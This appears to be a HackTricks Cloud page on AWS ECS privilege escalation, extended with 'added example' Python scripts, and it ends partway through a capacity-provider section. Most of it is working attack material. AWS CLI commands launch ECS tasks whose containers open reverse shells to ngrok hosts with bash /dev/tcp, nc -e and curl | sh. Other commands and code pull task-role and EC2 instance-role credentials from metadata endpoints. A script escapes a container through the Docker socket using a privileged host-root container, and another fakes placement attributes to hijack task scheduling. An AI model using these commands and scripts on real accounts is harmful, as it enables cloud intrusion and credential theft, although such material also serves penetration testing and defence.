AWS - ECS Privesc
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
ECS
More information about ECS in:
iam:PassRole, ecs:RegisterTaskDefinition, ecs:RunTask
An attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:RunTask permissions in ECS can register a new task definition with a malicious container that steals the metadata credentials, and then run it.
```bash
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
  --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
  --network-mode "awsvpc" \
  --cpu 256 --memory 512 \
  --requires-compatibilities "[\"FARGATE\"]" \
  --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
  --cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
  --launch-type FARGATE \
  --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"
# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
```
Potential Impact: Direct privesc to a different ECS role.
iam:PassRole,ecs:RunTask
An attacker with the iam:PassRole and ecs:RunTask permissions can launch a new ECS task with a modified execution role, task role and container command. The ecs run-task CLI command has an --overrides flag that lets you change executionRoleArn, taskRoleArn and the container command at launch time without modifying the task definition.
The IAM roles given as taskRoleArn and executionRoleArn must have a trust policy that allows the ecs-tasks.amazonaws.com service to assume them.
The attacker also needs to know:
- the ECS cluster name
- the VPC subnet
- the security group (if none is given, the VPC default security group is used)
- the task definition name and revision
- the container name
```bash
aws ecs run-task \
  --cluster <cluster-name> \
  --launch-type FARGATE \
  --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" \
  --task-definition <task-definition:revision> \
  --overrides '
{
  "taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
  "containerOverrides": [
    {
      "name": "<container-name>",
      "command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
    }
  ]
}'
```
In the example above the attacker only overrides taskRoleArn. Even so, the attacker needs iam:PassRole on the taskRoleArn given in the command and on the executionRoleArn set in the task definition for the attack to work.
If the IAM role the attacker can pass has enough privileges to pull the ECR image and run the ECS task (ecr:BatchCheckLayerAvailability, ecr:GetDownloadUrlForLayer, ecr:BatchGetImage, ecr:GetAuthorizationToken, plus logs:CreateLogStream and logs:PutLogEvents if the task definition uses the awslogs driver), the attacker can use the same IAM role for both executionRoleArn and taskRoleArn in the ecs run-task command.
```bash
aws ecs run-task \
  --cluster <cluster-name> \
  --launch-type FARGATE \
  --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" \
  --task-definition <task-definition:revision> \
  --overrides '
{
  "taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
  "executionRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
  "containerOverrides": [
    {
      "name": "<container-name>",
      "command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
    }
  ]
}'
```
Potential Impact: Direct privesc to any ECS task role.
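Two conditions decide which roles are reachable this way: the role's trust policy must name ecs-tasks.amazonaws.com, and the compromised principal must hold iam:PassRole on it, with any iam:PassedToService condition satisfied. The script below is an added example, not code from the HackTricks page: it takes trust policies in the shape aws iam get-role returns in Role.AssumeRolePolicyDocument and the IAM statements the attacker holds, and lists the roles usable as taskRoleArn/executionRoleArn, honouring explicit Deny statements. The account id, role names and policies are constructed sample data.

```python
"""Added example: which IAM roles can this principal pass to ECS tasks? Sample data is constructed."""
import fnmatch
import json

ECS_TASKS = "ecs-tasks.amazonaws.com"


def _as_list(v):
    return v if isinstance(v, list) else [v]


def _iam_match(pattern: str, value: str) -> bool:
    """IAM wildcard semantics for actions/resources: '*' any run, '?' one char."""
    return fnmatch.fnmatchcase(value, pattern)


def trusts_ecs_tasks(trust_policy: dict) -> bool:
    """True if an Allow statement lets ecs-tasks.amazonaws.com call sts:AssumeRole."""
    for st in _as_list(trust_policy.get("Statement", [])):
        if st.get("Effect") != "Allow":
            continue
        actions = [a.lower() for a in _as_list(st.get("Action", []))]
        if not any(_iam_match(a, "sts:assumerole") for a in actions):
            continue
        principal = st.get("Principal", {})
        if principal == "*":
            return True
        if isinstance(principal, dict) and ECS_TASKS in _as_list(principal.get("Service", [])):
            return True
    return False


def can_pass_role(statements: list, role_arn: str, to_service: str = ECS_TASKS) -> bool:
    """Evaluate iam:PassRole on role_arn: an explicit Deny wins, otherwise any matching Allow.
    Only the iam:PassedToService condition (StringEquals / StringLike) is modelled."""
    allowed = False
    for st in statements:
        actions = [a.lower() for a in _as_list(st.get("Action", []))]
        if not any(_iam_match(a, "iam:passrole") for a in actions):
            continue
        if not any(_iam_match(r, role_arn) for r in _as_list(st.get("Resource", []))):
            continue
        cond = st.get("Condition", {})
        services = []
        for op in ("StringEquals", "StringLike"):
            services += _as_list(cond.get(op, {}).get("iam:PassedToService", []))
        if services and not any(_iam_match(s, to_service) for s in services):
            continue  # condition not met for this service, so the statement does not apply
        if st.get("Effect") == "Deny":
            return False
        allowed = True
    return allowed


def ecs_privesc_targets(roles: dict, statements: list) -> list:
    """roles: {role_arn: trust_policy}. Returns the roles usable as taskRoleArn / executionRoleArn."""
    return sorted(arn for arn, tp in roles.items()
                  if trusts_ecs_tasks(tp) and can_pass_role(statements, arn))


# --- constructed sample input (account id and role names are made up) ---------
ACCOUNT = "123456789012"


def _trust(*services):
    return {"Version": "2012-10-17", "Statement": [{"Effect": "Allow",
            "Principal": {"Service": list(services)}, "Action": "sts:AssumeRole"}]}


SAMPLE_ROLES = {
    f"arn:aws:iam::{ACCOUNT}:role/ecsTaskExecutionRole": _trust(ECS_TASKS),
    f"arn:aws:iam::{ACCOUNT}:role/HighPrivilegedECSTaskRole": _trust(ECS_TASKS),
    f"arn:aws:iam::{ACCOUNT}:role/ecsInstanceRole": _trust("ec2.amazonaws.com"),
    f"arn:aws:iam::{ACCOUNT}:role/AdminTaskRole": _trust("ec2.amazonaws.com", ECS_TASKS),
}
# What the compromised principal holds: PassRole only towards ECS tasks, AdminTaskRole explicitly denied
SAMPLE_STATEMENTS = [
    {"Effect": "Allow", "Action": ["ecs:RunTask", "ecs:RegisterTaskDefinition"], "Resource": "*"},
    {"Effect": "Allow", "Action": "iam:PassRole", "Resource": f"arn:aws:iam::{ACCOUNT}:role/*Task*",
     "Condition": {"StringEquals": {"iam:PassedToService": ECS_TASKS}}},
    {"Effect": "Deny", "Action": "iam:PassRole", "Resource": f"arn:aws:iam::{ACCOUNT}:role/AdminTaskRole"},
]

if __name__ == "__main__":
    print(json.dumps(ecs_privesc_targets(SAMPLE_ROLES, SAMPLE_STATEMENTS), indent=2))
```

With the sample data only ecsTaskExecutionRole and HighPrivilegedECSTaskRole come back: ecsInstanceRole is not assumable by ecs-tasks.amazonaws.com, and AdminTaskRole is killed by the Deny. Feed it real input by collecting aws iam list-roles / get-role output and the statements from the principal's attached and inline policies.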
iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask
As in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:StartTask permissions in ECS can register a new task definition with a malicious container that steals the metadata credentials, and then start it.
In this case, however, a container instance (an EC2 instance registered in the cluster) is needed to run the malicious task definition, because start-task places the task on the instances you name instead of letting the scheduler choose one.
```bash
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
  --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
  --network-mode "awsvpc" \
  --cpu 256 --memory 512 \
  --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
# Start it on a container instance already registered in the cluster
# (awsvpc tasks need a network configuration even with start-task)
aws ecs start-task --task-definition iam_exfiltration \
  --cluster <cluster-name> \
  --container-instances <container-instance-id> \
  --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>]}"
# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
```
Potential Impact: Direct privesc to any ECS role.
iam:PassRole, ecs:RegisterTaskDefinition, (ecs:UpdateService|ecs:CreateService)
As in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:UpdateService or ecs:CreateService permissions in ECS can register a new task definition with a malicious container that steals the metadata credentials, and run it by creating a new service with at least one running task (or by pointing an existing service at the new task definition).
```bash
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
  --task-role-arn "$ECS_ROLE_ARN" \
  --network-mode "awsvpc" \
  --cpu 256 --memory 512 \
  --requires-compatibilities "[\"FARGATE\"]" \
  --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"
# Run the task creating a service
aws ecs create-service --service-name exfiltration \
  --task-definition iam_exfiltration \
  --desired-count 1 \
  --cluster "$CLUSTER_ARN" \
  --launch-type FARGATE \
  --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"
# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
  --service <SERVICE NAME> \
  --task-definition <NEW TASK DEFINITION NAME>
```
Potential Impact: Direct privesc to any ECS role.
iam:PassRole, (ecs:UpdateService|ecs:CreateService)
Without ecs:RegisterTaskDefinition you cannot create a new task definition, but an existing one can be reused and its task role and container command replaced through overrides. Note that --overrides is a flag of run-task and start-task (so the example below also requires ecs:RunTask); create-service and update-service accept no container overrides, and with only those two permissions you are limited to pointing a service at an existing task definition whose roles you are allowed to pass:
```bash
aws ecs run-task \
  --task-definition "<task-name>" \
  --overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
  --cluster <cluster-name> \
  --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"
```
Potential Impact: Direct privesc to any ECS role.
ecs:RegisterTaskDefinition, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)
This scenario is like the previous ones but without the iam:PassRole permission.
It is still interesting because, if you can run an arbitrary container even without a role, you could run a privileged container to escape to the node and steal the EC2 instance's IAM role and the roles of the other ECS containers running on that node.
You can even force other tasks to run on the EC2 instance you compromise in order to steal their credentials (as explained in the Privesc to node section).
Warning
This attack is only possible if the ECS cluster uses EC2 instances and not Fargate: Fargate tasks cannot bind-mount host paths such as the docker socket used below.
```bash
# Container definition: reverse shell with the node's docker socket mounted inside
printf '[
  {
    "name":"exfil_creds",
    "image":"python:latest",
    "entryPoint":["sh", "-c"],
    "command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
    "mountPoints": [
      {
        "readOnly": false,
        "containerPath": "/var/run/docker.sock",
        "sourceVolume": "docker-socket"
      }
    ]
  }
]' > /tmp/task.json
# Host volume pointing at the docker socket (host sourcePath is only valid on the EC2 launch type)
printf '[
  {
    "name": "docker-socket",
    "host": {
      "sourcePath": "/var/run/docker.sock"
    }
  }
]' > /tmp/volumes.json
aws ecs register-task-definition --family iam_exfiltration \
  --cpu 256 --memory 512 \
  --requires-compatibilities '["EC2"]' \
  --container-definitions file:///tmp/task.json \
  --volumes file:///tmp/volumes.json
aws ecs run-task --task-definition iam_exfiltration \
  --cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
  --launch-type EC2
# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
```
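Installing the docker CLI inside the reverse shell is noisy and needs outbound package access. The mounted socket is a plain HTTP endpoint, so the escape can be driven with the Python standard library alone. The script below is an added example, not code from the HackTricks page: it creates a privileged container on the node that bind-mounts the host root and shares the host PID and network namespaces, runs a command through chroot, and returns its output. The image name is an assumption (the task's own image, which the node has already pulled, since /containers/create does not pull), and the host command shown reads the node's EC2 instance-role credentials through IMDSv2.

```python
"""Added example: drive the node's Docker Engine API through the mounted socket (no docker CLI needed)."""
import http.client
import json
import os
import socket
import struct

SOCKET_PATH = "/var/run/docker.sock"
DEFAULT_IMAGE = "python:latest"  # assumption: the task's own image, so it is already cached on the node


class UnixHTTPConnection(http.client.HTTPConnection):
    """http.client over a UNIX socket; Docker does not care about the Host header value."""

    def __init__(self, path: str):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def escape_container_spec(host_cmd: str, image: str = DEFAULT_IMAGE) -> dict:
    """Body for POST /containers/create: privileged, host PID+network namespaces, host root at /host."""
    return {
        "Image": image,
        "Cmd": ["chroot", "/host", "/bin/sh", "-c", host_cmd],
        "HostConfig": {"Binds": ["/:/host"], "Privileged": True,
                       "PidMode": "host", "NetworkMode": "host"},
    }


def demux_docker_logs(raw: bytes) -> str:
    """Non-TTY log streams are framed: 1 byte stream id, 3 pad bytes, 4-byte big-endian payload length."""
    out, i = [], 0
    while i + 8 <= len(raw):
        length = struct.unpack(">I", raw[i + 4:i + 8])[0]
        out.append(raw[i + 8:i + 8 + length].decode(errors="replace"))
        i += 8 + length
    return "".join(out)


def _api(method: str, path: str, body=None, sock: str = SOCKET_PATH) -> bytes:
    """One request against the Engine API; raises on any non-2xx answer."""
    conn = UnixHTTPConnection(sock)
    headers = {"Content-Type": "application/json"} if body is not None else {}
    conn.request(method, path, body=json.dumps(body) if body is not None else None, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    if resp.status >= 300:
        raise RuntimeError(f"{method} {path} -> {resp.status}: {data[:200]!r}")
    return data


def run_on_host(host_cmd: str, image: str = DEFAULT_IMAGE, sock: str = SOCKET_PATH) -> str:
    """Create, run to completion, collect the output of, and delete the escape container."""
    cid = json.loads(_api("POST", "/containers/create", escape_container_spec(host_cmd, image), sock))["Id"]
    _api("POST", f"/containers/{cid}/start", sock=sock)
    _api("POST", f"/containers/{cid}/wait", sock=sock)
    logs = _api("GET", f"/containers/{cid}/logs?stdout=1&stderr=1", sock=sock)
    _api("DELETE", f"/containers/{cid}?force=1", sock=sock)
    return demux_docker_logs(logs)


# Host command: the node's EC2 instance-role credentials via IMDSv2 (we are in the host network namespace)
NODE_ROLE_CMD = (
    'T=$(curl -s -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60"); '
    'R=$(curl -s -H "X-aws-ec2-metadata-token: $T" http://169.254.169.254/latest/meta-data/iam/security-credentials/); '
    'curl -s -H "X-aws-ec2-metadata-token: $T" "http://169.254.169.254/latest/meta-data/iam/security-credentials/$R"'
)

if __name__ == "__main__":
    if os.path.exists(SOCKET_PATH):
        print(run_on_host(NODE_ROLE_CMD))
    else:  # no socket here: just show the request body that would be sent
        print(json.dumps(escape_container_spec(NODE_ROLE_CMD), indent=2))
```

Because the container shares the host PID namespace, the same spec also lets you walk /proc/<pid>/environ of the other ECS containers on the node to collect their AWS_CONTAINER_CREDENTIALS_RELATIVE_URI values; the log demuxer is needed because the Engine API multiplexes stdout and stderr into one framed stream when no TTY is allocated.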
ecs:ExecuteCommand, ecs:DescribeTasks,(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)
An attacker with ecs:ExecuteCommand and ecs:DescribeTasks can execute commands inside a running container and exfiltrate the IAM role attached to it (the describe permission is needed because aws ecs execute-command calls DescribeTasks before opening the session).
However, for this to work the task must have been launched with ECS Exec enabled so that the ExecuteCommandAgent runs alongside it (it is not enabled by default); the attacker's CLI also needs the Session Manager plugin installed.
So the attacker can try:
- Try to run a command in every running container
```bash
# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters --query 'clusterArns[]' --output text); do
  echo "Cluster $cluster"
  for task in $(aws ecs list-tasks --cluster "$cluster" --query 'taskArns[]' --output text); do
    echo "  Task $task"
    # If true, it's your lucky day
    aws ecs describe-tasks --cluster "$cluster" --tasks "$task" --query 'tasks[0].enableExecuteCommand'
  done
done
# Execute a shell in a container
aws ecs execute-command --interactive \
  --command "sh" \
  --cluster "$CLUSTER_ARN" \
  --task "$TASK_ARN"
```
Once you have a shell inside the container, you can usually extract the task role credentials from the task credentials endpoint and reuse them outside the container:
```bash
# Inside the container:
echo "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | jq
# If you want to use them locally, print shell exports:
python3 - <<'PY'
import json, os, urllib.request
u = "http://169.254.170.2" + os.environ["AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"]
d = json.load(urllib.request.urlopen(u, timeout=2))
print("export AWS_ACCESS_KEY_ID=" + d["AccessKeyId"])
print("export AWS_SECRET_ACCESS_KEY=" + d["SecretAccessKey"])
print("export AWS_SESSION_TOKEN=" + d["Token"])
PY
```
- If it has ecs:RunTask, run a task with aws ecs run-task --enable-execute-command [...]
- If it has ecs:StartTask, start a task with aws ecs start-task --enable-execute-command [...]
- If it has ecs:CreateService, create a service with aws ecs create-service --enable-execute-command [...]
- If it has ecs:UpdateService, update a service with aws ecs update-service --enable-execute-command [...]
You can find examples of these options in the previous ECS privesc sections.
Potential Impact: Privesc to a different role attached to the containers.
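The grep above only tells you whether enableExecuteCommand is set; a session still fails when the task is not running or when the ExecuteCommandAgent managed agent never reached RUNNING (for instance because the task role lacks the ssmmessages permissions). The script below is an added example, not code from the HackTricks page: it triages aws ecs describe-tasks output container by container, reports why a task is not exec-able, and prints the execute-command lines for the ones that are. The JSON is a constructed sample that follows the DescribeTasks response shape (tasks[].enableExecuteCommand, containers[].managedAgents[]).

```python
"""Added example: triage describe-tasks output for tasks where ECS Exec will actually work."""
import json
import sys

# Constructed sample in the shape of `aws ecs describe-tasks` output (one cluster, four tasks)
SAMPLE_DESCRIBE_TASKS = json.loads(r'''{
  "tasks": [
    {"taskArn": "arn:aws:ecs:eu-west-1:123456789012:task/API/1111", "lastStatus": "RUNNING",
     "enableExecuteCommand": true,
     "containers": [{"name": "api", "lastStatus": "RUNNING",
        "managedAgents": [{"name": "ExecuteCommandAgent", "lastStatus": "RUNNING"}]}]},
    {"taskArn": "arn:aws:ecs:eu-west-1:123456789012:task/API/2222", "lastStatus": "RUNNING",
     "enableExecuteCommand": true,
     "containers": [{"name": "worker", "lastStatus": "RUNNING",
        "managedAgents": [{"name": "ExecuteCommandAgent", "lastStatus": "STOPPED",
                           "reason": "agent failed to start"}]}]},
    {"taskArn": "arn:aws:ecs:eu-west-1:123456789012:task/API/3333", "lastStatus": "RUNNING",
     "enableExecuteCommand": false,
     "containers": [{"name": "db", "lastStatus": "RUNNING"}]},
    {"taskArn": "arn:aws:ecs:eu-west-1:123456789012:task/API/4444", "lastStatus": "PENDING",
     "enableExecuteCommand": true,
     "containers": [{"name": "batch", "lastStatus": "PENDING",
        "managedAgents": [{"name": "ExecuteCommandAgent", "lastStatus": "PENDING"}]}]}
  ],
  "failures": []
}''')


def triage_exec(describe_tasks: dict) -> list:
    """One row per container: is `aws ecs execute-command` expected to work, and if not, why."""
    rows = []
    for task in describe_tasks.get("tasks", []):
        for c in task.get("containers", []):
            agent = next((a for a in c.get("managedAgents", [])
                          if a.get("name") == "ExecuteCommandAgent"), None)
            if not task.get("enableExecuteCommand"):
                reason = "enableExecuteCommand=false (needs a new task/service with --enable-execute-command)"
            elif task.get("lastStatus") != "RUNNING" or c.get("lastStatus") != "RUNNING":
                reason = f"not RUNNING (task={task.get('lastStatus')}, container={c.get('lastStatus')})"
            elif agent is None:
                reason = "no ExecuteCommandAgent managed agent reported"
            elif agent.get("lastStatus") != "RUNNING":
                reason = f"ExecuteCommandAgent {agent.get('lastStatus')}: {agent.get('reason', '')}"
            else:
                reason = "ready"
            rows.append({"task": task["taskArn"], "container": c["name"],
                         "ready": reason == "ready", "reason": reason})
    return rows


def exec_commands(describe_tasks: dict, cluster: str, command: str = "sh") -> list:
    """Ready-to-run CLI lines for every container that passed triage."""
    return [f'aws ecs execute-command --interactive --cluster "{cluster}" '
            f'--task "{r["task"]}" --container "{r["container"]}" --command "{command}"'
            for r in triage_exec(describe_tasks) if r["ready"]]


if __name__ == "__main__":
    # Real input: aws ecs describe-tasks --cluster API --tasks <arns...> | python3 triage.py API
    data = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE_DESCRIBE_TASKS
    cluster = sys.argv[1] if len(sys.argv) > 1 else "API"
    for row in triage_exec(data):
        print("[+]" if row["ready"] else "[-]", row["container"], row["task"], "->", row["reason"])
    print("\n".join(exec_commands(data, cluster)))
```

On the sample only the api container is exec-able; the worker task has Exec enabled but its agent stopped, db was never started with Exec, and batch is still PENDING. Passing --container explicitly avoids the error execute-command raises when a task runs more than one container.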
ssm:StartSession
See in the ssm privesc page how you can abuse this permission to privesc to ECS:
iam:PassRole, ec2:RunInstances
See in the ec2 privesc page how you can abuse these permissions to privesc to ECS:
ecs:RegisterContainerInstance, ecs:DeregisterContainerInstance, ecs:StartTask, iam:PassRole
An attacker with these permissions can often turn "cluster membership" into a security-boundary bypass:
- Register an attacker-controlled EC2 instance in the victim's ECS cluster (becoming a container instance)
- Set custom container instance attributes to satisfy placement constraints
- Let ECS schedule tasks onto that instance
- Steal task role credentials (and any secrets/data inside the containers) from the tasks that run on your instance
High-level workflow:
- Get the EC2 instance identity document + signature from an EC2 instance you control in the target account (for example via SSM/SSH):
```bash
# IMDSv2 token first (required when the instance enforces IMDSv2)
TOKEN=$(curl -s -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document > iidoc.json
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/signature > iisig
```
- Register it in the target cluster, optionally setting attributes to satisfy placement constraints:
```bash
aws ecs register-container-instance \
  --cluster "$CLUSTER" \
  --instance-identity-document file://iidoc.json \
  --instance-identity-document-signature "$(cat iisig)" \
  --attributes name=labtarget,value=hijack
```
- Confirm it joined:
```bash
aws ecs list-container-instances --cluster "$CLUSTER"
```
- Run a task / update a service so that something gets placed on the instance, then harvest the task role creds from the task:
```bash
# On the container host:
docker ps
docker exec -it <container-id> sh
curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
```
Notes:
- Registering a container instance with an instance identity document/signature implies you have access to an EC2 instance in the target account (or have compromised one). For cross-account "bring your own EC2", see the ECS Anywhere technique on this page.
- The ECS agent must actually be running on that instance and joined to the same cluster (ECS_CLUSTER in /etc/ecs/ecs.config): the registration call only creates the membership record, while it is the agent that pulls and starts the tasks placed there.
- Placement constraints often depend on container instance attributes. Enumerate them with ecs:DescribeServices, ecs:DescribeTaskDefinition and ecs:DescribeContainerInstances to know which attributes to set.
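Placement constraints are written in the ECS cluster query language (memberOf expressions such as attribute:stack == prod or attribute:ecs.availability-zone in [us-east-1a, us-east-1b]), and the scheduler will simply never place a task on your instance until every expression holds. The script below is an added example, not code from the HackTricks page: it evaluates the expressions found in describe-services / describe-task-definition against the attributes your instance reports in describe-container-instances, and turns the gaps into the --attributes values to register with. Built-in ecs.* attributes come from the instance itself (they cannot be set by hand), so those are reported as needing a different instance. The expressions and attribute set are constructed sample data; the "present" and "any" values it proposes for exists / != terms are arbitrary placeholders.

```python
"""Added example: turn ECS placement constraints into the attributes an attacker instance must present."""
import re

# One term of the cluster query language: "<key> <op> <value>", keys like attribute:stack or task:group
TERM = re.compile(r"^(?P<key>[\w.:/-]+)\s+(?P<op>==|!=|=~|!~|in|not_in|exists|!exists)\s*(?P<val>.*)$")


def _values(raw: str) -> list:
    raw = raw.strip()
    if raw.startswith("[") and raw.endswith("]"):
        return [v.strip() for v in raw[1:-1].split(",") if v.strip()]
    return [raw]


def term_satisfied(term: str, attrs: dict):
    """Evaluate one term against the instance attributes. Returns (ok, fix) where fix is
    ("set", name, value), ("unset", name, None) or ("manual", name, None)."""
    m = TERM.match(term.strip())
    if not m:
        raise ValueError(f"unsupported term: {term!r}")
    key, op, raw = m.group("key"), m.group("op"), m.group("val")
    if not key.startswith("attribute:"):
        return True, None          # task:group etc. do not depend on the instance
    name = key[len("attribute:"):]
    have, vals = attrs.get(name), _values(raw)
    if op == "exists":
        return have is not None, ("set", name, "present")
    if op == "!exists":
        return have is None, ("unset", name, None)
    if op == "==":
        return have == vals[0], ("set", name, vals[0])
    if op == "in":
        return have in vals, ("set", name, vals[0])
    if op == "=~":
        return have is not None and re.fullmatch(vals[0], have) is not None, ("manual", name, None)
    if op == "!~":
        return have is not None and re.fullmatch(vals[0], have) is None, ("manual", name, None)
    # != / not_in: a missing attribute can be set to anything, a conflicting one needs a human decision
    ok = have is not None and (have != vals[0] if op == "!=" else have not in vals)
    return ok, (("set", name, "any") if have is None else ("manual", name, None))


def plan_attributes(expressions: list, attrs: dict) -> dict:
    """For every placement expression, what must change on the attacker instance.
    Built-in ecs.* attributes are reported as manual (pick another instance type / AZ)."""
    plan = {"satisfied": True, "set": {}, "unset": [], "manual": []}
    for expr in expressions:
        groups = [re.split(r"\s+and\s+", g) for g in re.split(r"\s+or\s+", expr)]
        if any(all(term_satisfied(t, attrs)[0] for t in g) for g in groups):
            continue
        plan["satisfied"] = False
        for term in groups[0]:      # fix up the first alternative
            ok, fix = term_satisfied(term, attrs)
            if ok:
                continue
            kind, name, value = fix
            if name.startswith("ecs.") or kind == "manual":
                plan["manual"].append(term.strip())
            elif kind == "set":
                plan["set"][name] = value
            else:
                plan["unset"].append(name)
    return plan


def attributes_cli(plan: dict) -> list:
    """Shorthand values for `aws ecs register-container-instance --attributes ...`"""
    return [f"name={k},value={v}" for k, v in sorted(plan["set"].items())]


# Constructed sample: expressions taken from describe-services / describe-task-definition placementConstraints
SAMPLE_EXPRESSIONS = [
    "attribute:labtarget == hijack",
    "attribute:ecs.availability-zone in [us-east-1a, us-east-1b] and attribute:ecs.instance-type =~ t3.*",
    "attribute:tier exists and attribute:quarantine !exists",
]
# Constructed sample: attributes of the attacker instance as reported by describe-container-instances
SAMPLE_INSTANCE_ATTRS = {"ecs.availability-zone": "us-east-1c", "ecs.instance-type": "t3.small",
                         "ecs.os-type": "linux"}

if __name__ == "__main__":
    p = plan_attributes(SAMPLE_EXPRESSIONS, SAMPLE_INSTANCE_ATTRS)
    print("register with: --attributes", " ".join(attributes_cli(p)))
    print("needs a different instance for:", p["manual"])
```

On the sample the instance type already matches t3.*, so the plan is to register with name=labtarget,value=hijack name=tier,value=present and to move the instance to us-east-1a or us-east-1b, which no attribute can fake. Expressions using or are satisfied by any one alternative; the planner only fixes up the first.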
ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, ecs:DescribeTaskSets
Note
TODO: Test
An attacker with the ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet and ecs:DescribeTaskSets permissions can create a malicious task set for an existing ECS service and make it the primary task set. This lets the attacker execute arbitrary code inside the service. Task sets only exist for services that use the EXTERNAL deployment controller, and ecs:RegisterTaskDefinition is needed for the first command below.
```bash
# Register a task definition with a reverse shell
# (awsvpc so the task set's network configuration applies; container memory is required on EC2)
echo '{
  "family": "malicious-task",
  "networkMode": "awsvpc",
  "containerDefinitions": [
    {
      "name": "malicious-container",
      "image": "alpine",
      "memory": 128,
      "command": [
        "sh",
        "-c",
        "apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
      ]
    }
  ]
}' > malicious-task-definition.json
aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json
# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service \
  --task-definition malicious-task \
  --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"
# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service \
  --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id
```
Potential Impact: Arbitrary code execution in the affected service, which can disrupt its functionality or lead to exfiltration of sensitive data.
Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)
An attacker with permissions to manage ECS capacity providers and update services can create an EC2 Auto Scaling Group under their control, wrap it in an ECS Capacity Provider, associate it with the target cluster and migrate the victim's service to that provider. Tasks will then be scheduled on attacker-controlled EC2 instances, giving OS-level access to inspect the containers and steal task role credentials.
Commands (us-east-1):
- Prerequisites
- Create a launch template so the ECS agent joins the target cluster
